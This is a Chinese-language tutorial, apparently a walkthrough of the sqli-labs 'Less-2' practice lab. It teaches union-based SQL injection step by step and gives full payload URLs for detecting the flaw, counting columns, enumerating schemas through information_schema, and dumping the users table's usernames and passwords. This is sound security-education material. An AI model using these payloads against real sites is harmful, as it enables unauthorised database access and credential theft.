SQL注入流程

  • SQL注入流程:
  • 1、判断是否有注入(判断是否为严格校验)
  • 2、什么类型的SQL注入
  • 3、语句是否能够被恶意修改
  • 4、是否能够成功被带入执行
  • 5、获取我们想要的数据

获取数据库 -> 获取表 -> 获取字段 -> 获取字段内容

判断是否有注入

注入点 : http://43.247.91.228:84/Less-2/?id=1

1
2
3
4
5
6
7
8
9
10
11
12
13
14
常见的有:
第一种:and
and 1=1 返回正常
and 1=2 返回错误

第二种:.0 、 .1
?id=3.0 返回正常
?id=3.1 返回错误

第三种:' (单引号)
?id=3' 加单引号报错

第四种:-1
?id=3-1 会返回 ?id=2 这个页面

正常页面:

图片

and 1=1 返回正常:

图片

and 1=2 返回错误

图片

加单引号返回错误显示

图片

判断后,存在SQL注入!

获取数据

MySQL 中,有一个很重要的数据库:information_schema,而它有三个很重要的表

第一个表个是:SCHEMATA
information_schema , 而这个数据库中的 SCHEMATA 表中的 SCHEMA_NAME 列中的值有我们的所有的数据库名

图片

information_schema
第二个表是:TABLES TABLES 这个表里的包含了数据库中所有的字段

图片

information_schema
第三个表是:COLUMNS COUMNS 这个表里的包含了数据库中所有的表

图片

查询想要的数据

使用 union 查询是否有 4 列 , %23# 号的 URL 编码,是注释的意思(列数一样就不报错,列数不一样就报错)
http://43.247.91.228:84/Less-2/?id=2 union select 1,2,3,4 %23

这边是报错了,显示:The used SELECT statements have a different number of columns (查询的内容前后的列数不一致)说明不是 4 列

图片

使用 union 查询是否有 3 列 , %23# 号的 URL 编码,是注释的意思(因为刚刚判断是否有4列出错了,那么就往前减少一位数字判断)
http://43.247.91.228:84/Less-2/?id=2 union select 1,2,3 %23

这边是显示正常,说明是 3

图片

这里有个疑问,这个 1,2,3 是什么意思呢?
1,2,3,是一个占位的意思。它的意思就是判断前面的列数有几列,一个逗号分隔的就是一列
写其他的也可以,例如:66,777,8888

图片

这个时候就可以在 1,2,3 占位符里使用 SQL 语句来查询了!
因为有 union 查询,是查询前面和后面联合起来查询的,假如直接在列里插入 user() //查询当前数据库用户名,不会显示

图片

这是为什么呢?
因为 左边的 http://43.247.91.228:84/Less-2/?id=2 是一条查询语句
右边的 select 1,user(),3 %23 没有任何条件也可以查询出来
合并起来就是两条数据,但是呢它在显示数据的时候,默认只显示它的第一个数据,就是左边的数据,右边的数据有也不显示
这个时候我们就可以让左边的数据没有,就可以显示出了:

-2 是没有的,然后就可以构造语句 : http://43.247.91.228:84/Less-2/?id=-2 union select 1,user(),3 %23
这个时候就查询出当前数据库用户名是 root

图片

查询 information_schema 数据库中的 schemata 表里的 schema_name 字段
http://43.247.91.228:84/Less-2/?id=-2 union select 1,schema_name,3 from information_schema.schemata %23

详解:
information_schema.schemata 查询 information_schema 数据库下的 schemata 表
schema_name 这个就是 schemata 表里的字段
下面是数据库的结构:

图片

这边只查询出一条数据,查询出来后会显示第一个的字段内容:information_schema

图片

想要查询所有的呢,就可以使用一个函数:group_concat() 吧所有的列的数据都显示,以逗号分隔

http://43.247.91.228:84/Less-2/?id=-2 union select 1,group_concat(schema_name),3 from information_schema.schemata %23

详解:
group_concat(schema_name) 这个是用 group_concat 函数查询 schema_name 字段中的所有数据,并以逗号显示出来

这样就查询出了所有的数据库 : information_schema,challenges,hacker,mysql,security,sql,test

图片

查询当前所使用的数据库名

使用 database() 查询当前数据库名:

http://43.247.91.228:84/Less-2/?id=-2 union select 1,database(),3 from information_schema.schemata %23
database() 是SQL语句中查询当前数据库名的函数
这边查询出来,当前所使用的数据库名是:security

图片

知道了当前所使用的数据库是 security 后,我们需要查询数据库下有那些表:(所有的)
http://43.247.91.228:84/Less-2/?id=-2 union select 1,group_concat(table_name),3 from information_schema.tables %23

详解:
information_schema.tables 查询 information_schema 数据库下的 tables 的内容
group_concat(table_name) 使用 group_concat() 函数来显示出 table_name 列中的所有字段内容

图片

图片

上面的列出了所有的表了,但是我们想获取当前数据库下的表:
http://43.247.91.228:84/Less-2/?id=-2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema = database() %23

详解:
information_schema.tables 查询 information_schema 数据库下的 tables 表
where table_schema = database() 使用 where 来指出只查询 table_schema 字段里当前所使用的数据库里的表(这个是一个条件语句)
database() 是一个函数,查看当前数据库名

现在我们知道了,当前所使用的数据库中有四张表:mails,referers,uagents,users
一般 users 里会保存账号密码

图片

图片

查询 users 表里的字段:
http://43.247.91.228:84/Less-2/?id=-2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema = database() and table_name='users' #

详解:
information_schema.columns 查询 information_schema 数据库下的 columns 表
where table_schema = database() 使用 where 来指出只查询 table_schema 字段里当前所使用的数据库里的表(这个是一个条件语句)
and table_name=’users’ and 条件语句来指出查询 table_name 表里的 ‘users’ 字段

这里就查询出了 users 表下的字段:id,username,password

图片

查询 username,password 字段内容:
http://43.247.91.228:84/Less-2/?id=-2 union select 1,username,password from security.users #

详解:
在占位符中填写刚刚查询出来的字段名:username,password
from security.users 查询 security 数据库中的 users 表

查询出来了,他们两个的值是 Dumb(这边只是默认的第一行)

图片

图片

查询所有的字段内容:
http://43.247.91.228:84/Less-2/?id=-2 union select 1,group_concat(username),group_concat(password) from security.users #

详解:
还是使用 group_concat() 这个函数来实现的!

但是现实出来的不是那么的美观,而且你也不知道那个用户名对应的是那个密码

图片

使用函数来实现让它们一一对应现实出账号密码:

http://43.247.91.228:84/Less-2/?id=-2 union select 1,concat(':',username,password),3 from security.users #

详解:
concat(‘:’,username,password) 使用concat()函数来对 username,password 来一一对应
':' 是为了让账号和密码用 : 来分隔

图片

查询所有的列:
http://43.247.91.228:84/Less-2/?id=-2 union select 1,group_concat(concat(‘:’,username,password)),3 from security.users #

详解:
group_concat(concat(‘:’,username,password))
还是使用 concat(‘:’,username,password) 来对 username,password 来一一对应,并使用 : 来进行分隔
而 group_concat() 函数是用来现实全部的

图片